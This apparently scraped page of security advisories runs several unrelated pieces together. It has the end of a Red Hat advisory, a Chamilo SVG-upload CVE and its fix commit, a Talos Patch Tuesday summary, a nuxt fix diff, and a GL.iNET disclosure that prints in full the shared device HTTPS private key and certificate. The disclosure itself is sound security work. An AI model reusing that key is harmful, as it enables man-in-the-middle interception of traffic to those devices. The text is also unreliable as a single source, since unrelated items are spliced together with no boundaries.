https://access.redhat.com/security/cve/CVE-2022-41674  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/cve/CVE-2022-42720  
https://access.redhat.com/security/cve/CVE-2022-42721  
https://access.redhat.com/security/cve/CVE-2022-42722  
https://access.redhat.com/security/cve/CVE-2022-43750  
https://access.redhat.com/security/cve/CVE-2022-47929  
https://access.redhat.com/security/cve/CVE-2023-0394  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-1195  
https://access.redhat.com/security/cve/CVE-2023-1582  
https://access.redhat.com/security/cve/CVE-2023-2491  
https://access.redhat.com/security/cve/CVE-2023-22490  
https://access.redhat.com/security/cve/CVE-2023-23454  
https://access.redhat.com/security/cve/CVE-2023-23946  
https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-27539  
https://access.redhat.com/security/cve/CVE-2023-28120  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIfBndzjgjWX9erEAQj/Vg/8D/xYKPgCJDjD2IbguRkgOWsZ5r5BP36n  
pbizOqZem1fs5J1oxmKotej5vE/BD5iumTsNYY59E1y/MjrBYPkaTjnHwgxkNYq/  
Lptwmt7pc2jE92E4qUMa5LpUhJxLQfw10SAMmYFVJIqOjVh+82XhU5NW5bJYStRs  
767suxjFzYZs8CHwpVyBVqEfI/sCyU+Ok3Pja5McaPjomAt9cNYfXoaPUSq3UMMD  
ifVOjVz3fE8YY6UhmVY5SPHrG4Ak2YcKOpyJ/A3UjRuKOTrtnLSxtLZisH4UMetZ  
R0e2ovt1TP4emH9Cblhl18qZxfi6RsveAwQ3IUplCltSRMbl7hrLB11cbAUUoPPc  
+MGvw6id7BHpH/0pBR1u7HH04VlzK/J1/pAiJNR3uL8W4OomgF9A5oSXSoJ9mY9C  
hFjUvQp7rR3+l9ivIT5pb//7lGBJs+QIn/W8OJXWEdqUMpC1ybPnJX7+azLUjLAt  
w7WEuMS7usNdDAUzP/sYFVlHfsNtOKHvx8c+DUi8ti9gkaXakw6VZIUh0g3ZUvmi  
hUWP7oktj6dZyISk75TpmpPppL5pmlKoHREJgiohSXUnFtp/XsYRAoZRfMbbqKr4  
MmyT7J11sfRH5+M1294PtdYJodXu13GESfjW38urAhVE/1SLpvWMQTv7U9CnDimF  
m78/igCYu/A=NjOC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3495-01

An arbitrary file upload vulnerability in the /fileUpload.lib.php component of Chamilo 1.11.* up to v1.11.18 allows attackers to execute arbitrary code via uploading a crafted SVG file.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

chamilo / **chamilo-lms** Public

*   Notifications
*   Fork 441
*   Star 685
    

*   Code
*   Issues 436
*   Pull requests 27
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Vendor: Require enshrined/svg-sanitize

*   Loading branch information

AngelFQC committed

Jun 2, 2023

1 parent d0cc583 commit f6e8355

Showing **1 changed file** with **1 addition** and **0 deletions**.

1 change: 1 addition & 0 deletions composer.json

Show comments View file

Expand Up

@@ -59,6 +59,7 @@

"doctrine/orm": "~2.5",

"emojione/emojione": "1.3.0",

"endroid/qr-code": "2.5.\*",

"enshrined/svg-sanitize": "^0.16.0",

"essence/essence": "2.6.1",

"ezyang/htmlpurifier": "~4.9",

"facebook/php-sdk-v4": "~5.0",

Expand Down

**0 comments on commit f6e8355**

Please sign in to comment.

CVE-2023-34944: Vendor: Require enshrined/svg-sanitize · chamilo/chamilo-lms@f6e8355

For the first time in four months, none of the vulnerabilities Microsoft disclosed this Patch Tuesday have been exploited in the wild.

Tuesday, June 13, 2023 14:06

Microsoft released its monthly security update Tuesday, disclosing 69 vulnerabilities across its suite of products and software. Five of these vulnerabilities are considered to be critical, 45 of them are listed as being high severity, 17 of them are medium severity and two are of low severity.

For the first time in four months, none of the vulnerabilities Microsoft disclosed this Patch Tuesday have been exploited in the wild. June is also closer to an average month for Microsoft’s security update after only disclosing 40 vulnerabilities last month, which was nearly a three-year low.

Cisco Talos discovered two vulnerabilities in Microsoft Excel that the company patched Tuesday. These are important-severity remote code execution vulnerabilities that are triggered if the targeted user opens an attacker-created file.

Three critical vulnerabilities — CVE-2023-29363, CVE-2023-32014 and CVE-2023-32015 — in the Windows Pragmatic General Multicast (PGM) server environment with a severity score of 9.8 could lead to remote code execution. In a Windows Pragmatic General Multicast (PGM)  server environment where the Windows message queuing service is running, an attacker could send a specially crafted file over the network to achieve remote code execution and attempt to trigger malicious code. Microsoft has advised users to refer to a setting, standard configuration, or general best practice existing in a default state that could reduce the severity of exploitation of this vulnerability.

CVE-2023-29357 is an elevation of privilege vulnerability in Microsoft SharePoint Server that also has a severity score of 9.8. An attacker who successfully exploits this vulnerability could gain administrator-level privileges. They could have access to spoof the JSON Web Token \[JWT\] authentication tokens and use them to execute a network attack that bypasses the authentication and allows them to gain access to the privileges of an authenticated user. The attacker requires no user interaction to exploit this vulnerability. Microsoft has advised that customers should apply all updates offered for the SharePoint Enterprise server. On-premises customers can enable the AMSI feature, which protects them from this vulnerability.

Talos would also like to highlight a few high-severity vulnerabilities that Microsoft considers “more likely” to be exploited.

A high-severity remote code execution vulnerability, CVE-2023-28310, exists in Microsoft Exchange Server. An authenticated attacker on the same intranet as the Exchange Server can achieve remote code execution via a PowerShell remote session.

CVE-2023-29358, an elevation of privilege vulnerability in the Windows graphics device interface (GDI), is a use-after-free vulnerability in the Win32k kernel driver. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

CVE-2023-29361 could also allow an attacker to gain SYSTEM privileges if they exploit a use-after-free issue in the Windows Cloud Files Mini Filter Driver.

Microsoft Exchange server contains a high-severity remote code execution vulnerability, CVE-2023-32031, with a severity score of 8.8. An attacker successfully exploiting this vulnerability could target the server accounts in an arbitrary or remote code execution. As an authenticated user, the attacker could attempt to trigger malicious code in the context of the server's account through a network call.

Another elevation of privilege vulnerability, though only considered "important," CVE-2023-29371, exists in the Windows Win32k kernel driver. An attacker could modify a curve without updating the cCurves values, which leads to an out-of-bounds write in win32kfull when the curves’ edges get processed, ultimately giving them system privileges.

One medium-severity worth noting is CVE-2023-29352, a security feature bypass vulnerability in Windows Remote Desktop. An attacker who successfully exploited this vulnerability could bypass certificate validation during a remote desktop connection by creating a validly signed “.RDP” file to bypass warning prompts when executed.

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 61907 - 61911, 61915, 61916, 61933  - 61935 and 61937 - 61939. The Snort 3 rules released for these vulnerabilities are 300592, 300593, 300595 and 300600.

Microsoft discloses 5 critical vulnerabilities in June's Patch Tuesday, no zero-days

Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3.

Expand Up @@ -10,6 +10,7 @@ import FriendlyErrorsWebpackPlugin from '@nuxt/friendly-errors-webpack-plugin' import escapeRegExp from 'escape-string-regexp' import { joinURL } from 'ufo' import type { NuxtOptions } from '@nuxt/schema' import { isTest } from 'std-env' import type { WarningFilter } from '../plugins/warning-ignore' import WarningIgnorePlugin from '../plugins/warning-ignore' import type { WebpackConfigContext } from '../utils/config' Expand Down Expand Up @@ -233,6 +234,7 @@ function getEnv (ctx: WebpackConfigContext) { 'process.env.NODE\_ENV': JSON.stringify(ctx.config.mode), 'process.mode': JSON.stringify(ctx.config.mode), 'process.dev': options.dev, 'process.test': isTest, \_\_NUXT\_VERSION\_\_: JSON.stringify(ctx.nuxt.\_version), 'process.env.VUE\_ENV': JSON.stringify(ctx.name), 'process.browser': ctx.isClient, Expand Down

CVE-2023-3224: fix(nuxt): restrict access to single renderer outside of test/rootDir… · nuxt/nuxt@65a8f4e

GL.iNET GL-AR750S-Ext firmware v3.215 uses an insecure protocol in its communications which allows attackers to eavesdrop via a man-in-the-middle attack.

Justin Applegate

**CVE-2023-33620: GL.iNET Static HTTPS Certificate**

*   **CVSS Score** - 6.8, Medium (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N)
*   **Overview** - All GL.iNET IoT devices use the same default self-signed HTTPS cert, meaning the traffic can be decrypted or modified using a Man-in-the-Middle attack.
*   **Description** - HTTPS is a protocol that uses HTTP for web requests and responses, but with SSL/TLS encryption on top of it. The communication is encrypted through the use of a certificate with the private key being kept secret - knowledge of this private key allows any intercepted traffic to be decrypted or modified. This would allow an attacker maliciously placed on the network to intercept sensitive information, such as authentication tokens, which would allow them to run arbitrary commands on the device. This certificate is self-signed and a warning will show up on most browsers, but this is not because the HTTPS connection doesn’t encrypt the data. The traffic is still encrypted, however the certificate is not authorized by a trusted authority (and for good reason). Dynamically generating different self-signed certificates for each GL.iNET device would allow the traffic to be encrypted and prevent Man-in-the-Middle attacks.
*   **Steps to reproduce** - A list of publicly-available GL.iNET devices with the same SSL certificate can be found using this Shodan query. Note how the SHA 256 fingerprint is the same for each site, regardless of the model. The corresponding HTTPS private key can be extracted at the location /etc/lighttpd/server.pem from any GL.iNET device, and is also provided below.
    *   SHA 256 fingerprint - 97 B6 C5 3F 60 45 8B BE 47 27 9B 87 B1 67 87 6F 49 D3 2C DC B6 A5 84 D8 E4 FC CA 9E AF 53 AC 24

**Fix**

This was not fixed in 3.216. In a follow-up with the company, they said “The router is supposed to be accessed locally and http is fine… The user can replace the certificate manually. If the user \[does\] not have knowledge/skills to do this, they should just use http and \[not\] access the router from \[the\] WAN side.”

**HTTPS Private Key and Certificate**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  

\-----BEGIN PRIVATE KEY-----  
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDSnEJL9ymbUrPj  
iOwFAKIiJcobxQRPbr9qGCWJNP1wpep/dz6GOWWBAmSL/E2Dy0MNoyVfDD7sl+F8  
jbK+frARzPwPavgDbA1LVwInV2sVTSd88JDrmI3gby2hnpQRRh3zVEmJUvTop60q  
I977iid9yckoNFSdikI0adF/CEdrVQ9qZILaJFJ0XCvfF1N2YsxT/QHLZ6oM9QuV  
EflIKQQb8YTr6XSwvX8uwsUNBu44+5PIoYvBlZYL38pYRXTY/d8vXdUNE9uG1Ewq  
4IQxMiEQ7mPSpliaig3LVhMsBB74fjx73a4QCy1sQ0gA2CCl7HKIDzRfXljWUude  
NL2AqOJbAgMBAAECggEAPYwMk8aXEh0JFOVek9erie8hMRxSNiRXK9oCniYuKk1S  
Sg2+59q+HwVj/MSuomU0IzgaI7ygZuO7sXp3UdQUAB+3SYopEFbzS6ERsA2L7Z2u  
fISQ1UivrXbQDvsYqjOjbQiktMzZZWQa5sW01C17fPcLIgSo9aEB1+9UmZsBxAt/  
nvMqGh+9lZQoN38tck8XbDNAZPbQtuvOfW5g48C/jhAu9czFkxh4b8aSvZp8Md8Q  
lL5ukNKdE2dXFwJe8V1gSGvSPBMhLfMeLiU7JzIixK5a4vGpXEEWsti/xyBrI1AA  
6t1oNDYjLAr4ihAC1gWKl3Tcgrt6M920XaLI2WMBAQKBgQD0vfDE+Ma3Qx5mSPNP  
IBZq3Io+QVGZuvVAGJLPjvimyAYDSU1lcz1MpJjIFWcCP3khomu914P4cuji1mmh  
k7e7+/S838Xt5EAaFJLPXeueXRAC844ev9xqPpx1QkbVyatrCTv0fxf6be1dqU3o  
gM2jBsSoIqA2hn8fdBW968jxqQKBgQDcTGNd48ztrJ6u+X2PwlkVLbwqg5LjArNf  
JUfLKk2eyY0EOoNQC0SWhQtfE62xNat5zC9YFUEfVcA6S9ZmJeJz9ybd5jqAwweF  
sU/vQk8lXXNzPyrhxLlctPCLvGWR2SCcDKOb0SHwBg9HF+gmGXWh/cUKiCGfpbJO  
trJ7CNi+YwKBgA5TP9CHrzny18is5HDxM961YfIa6KfS5aAG0DEN8Ufx1UhD9h/G  
CwR9bePoPMtI49IwK5ZFExhrwW3llvE6MDr0mHKltnQiNA5SvfUdTjlKwTErCFqM  
aF5fo9DJPFQvJbVyKOw6tDCYVphw3HqLb33nW4Nr42zNmotAxDUFpBFhAoGBAJcj  
CSEHAjclMJDWteAE89zlzaxVLFb2KV1jVEf8M9h2anq2MhSeRmYFzPFjrMxhB829  
2dVSb6UxzXmxQdw+rYflzhJ6uzRPmT+NkEuTcH0wCd7NPXw63PjPYiBcFkrjbc3h  
lfV2mxPy9FRQAILzAJMsaRx6nKbMpPH/wZ9LSHgFAoGAMjsJ0/zhk1Gj41UAQrUs  
RM3rzjXcWGc4qh10cjpRpIVVxPXqjNfCBmsVzcchM2jEeN/SK+VK6uWGtobw4wti  
1WUN5DG2eIi27B2Xg7pmvZ7ZsdvJKPgMZnHrp/puLL+CN6Krz2WXRku9YnuEqHeX  
5ARXlMuR0kdg2AtByNL+FNI=  
\-----END PRIVATE KEY-----  
\-----BEGIN CERTIFICATE-----  
MIID6zCCAtOgAwIBAgIJAOauAItoZrcDMA0GCSqGSIb3DQEBCwUAMIGLMQswCQYD  
VQQGEwJDTjESMBAGA1UECAwJR1VBTkdET05HMREwDwYDVQQHDAhTSEVOWkhFTjEQ  
MA4GA1UECgwHZ2wtaW5ldDEQMA4GA1UECwwHZ2wtaW5ldDEPMA0GA1UEAwwGcm91  
dGVyMSAwHgYJKoZIhvcNAQkBFhFhZG1pbkBnbC1pbmV0LmNvbTAeFw0xOTAzMDQx  
MDQ3NTlaFw0zOTAyMjcxMDQ3NTlaMIGLMQswCQYDVQQGEwJDTjESMBAGA1UECAwJ  
R1VBTkdET05HMREwDwYDVQQHDAhTSEVOWkhFTjEQMA4GA1UECgwHZ2wtaW5ldDEQ  
MA4GA1UECwwHZ2wtaW5ldDEPMA0GA1UEAwwGcm91dGVyMSAwHgYJKoZIhvcNAQkB  
FhFhZG1pbkBnbC1pbmV0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC  
ggEBANKcQkv3KZtSs+OI7AUAoiIlyhvFBE9uv2oYJYk0/XCl6n93PoY5ZYECZIv8  
TYPLQw2jJV8MPuyX4XyNsr5+sBHM/A9q+ANsDUtXAidXaxVNJ3zwkOuYjeBvLaGe  
lBFGHfNUSYlS9OinrSoj3vuKJ33JySg0VJ2KQjRp0X8IR2tVD2pkgtokUnRcK98X  
U3ZizFP9Actnqgz1C5UR+UgpBBvxhOvpdLC9fy7CxQ0G7jj7k8ihi8GVlgvfylhF  
dNj93y9d1Q0T24bUTCrghDEyIRDuY9KmWJqKDctWEywEHvh+PHvdrhALLWxDSADY  
IKXscogPNF9eWNZS5140vYCo4lsCAwEAAaNQME4wHQYDVR0OBBYEFPjZu+Us1pxK  
xLwgo9oqnA6X3tPEMB8GA1UdIwQYMBaAFPjZu+Us1pxKxLwgo9oqnA6X3tPEMAwG  
A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAEcuKqwUVA57PP52+Iofleur  
kG7hvIFukf38MAFckRgP7Q2jMt6kzC+HXYtpdSUomjAv06tNU5cawyEVnWiu5IHa  
r1PhaMCaz+rTmU1ld7g570pYPgfjW0kigSus+XM6RAnmRR/Nv3aXDS1x0BizswKx  
0MxNmMXXKiJOGJKIs6Wk0uz8f1CDLpOhd5fYLkOlEHW4dkSc5Hu1mQTYvNtuReOI  
4GNKjai/8nhrlJHGLd1Db36AqVc0kB0UAFMkWlFv6oIaxdVnI/etCThT+xik1VXC  
of3/V6+7vxDMTpYEVfVUURUMXgAVSTK8e+I3z3yGzU7vYFK5tdCcloYkIviItYY=  
\-----END CERTIFICATE-----  
  

  

Theme Pure | Powered by Hexo and Cookies I take no responsibility for anything on this site because that's too much work

Tag

#js